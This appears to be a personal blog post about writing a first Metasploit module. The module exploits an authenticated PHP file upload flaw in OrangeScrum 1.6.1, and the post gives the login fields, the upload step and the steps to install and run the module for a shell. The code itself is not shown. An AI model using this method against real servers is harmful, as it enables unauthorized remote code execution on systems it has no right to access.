After learning to make exploit in python, this time I learning to make exploit in metasploit. I think it is more difficult, but also more fun. And I never code in ruby before (metasploit is written in ruby).
This exploit is metasploit exploit version of my current orangescrum 1.6.1 python exploit, and also my first one. This exploit is so simple, it took me less than a day to learn and make it. FYI, I just take a sample from an existing exploit, then modify it in order to work with the vulnerability. Because, one of best code learning method is by modify existing code, isn’t it 😀
My configuration :
- Ubuntu machine hosting orangescrum 1.6.1 as target
- Kali linux (virtualbox) with metasploit and geany
This is how this exploit works (to learn how the vulnerability in orangescrum 1.6.1 works, you can read the article here).
- Login to orangescrum. Login path is http://yourserver/yourorangescrum/users/login using POST method with data data[User][email], data[User][password] and submit_Pass
- If login is success then the server will send the cookie and the page will be redirected to dashboard. if fails it will be redirected to login page.
- Then uploads php file using the cookie for authentication
- If upload is success, then access the file
These are some of the code
Function for login
Function for upload file
For full code you can download it here
How to install it to your metasploit
- copy file orangescrum_upload.rb to your http exploit directory. in my kali, it is located at /usr/share/metasploit-framework/modules/exploit/multi/http
- reload your metasploit modules with command reload_all
Now, we try our new exploit.
- choose the exploit
- set target address (RHOST), TARGETURI, USERNAME, and PASSWORD of orangescrum app.
- exploit… and we got a shell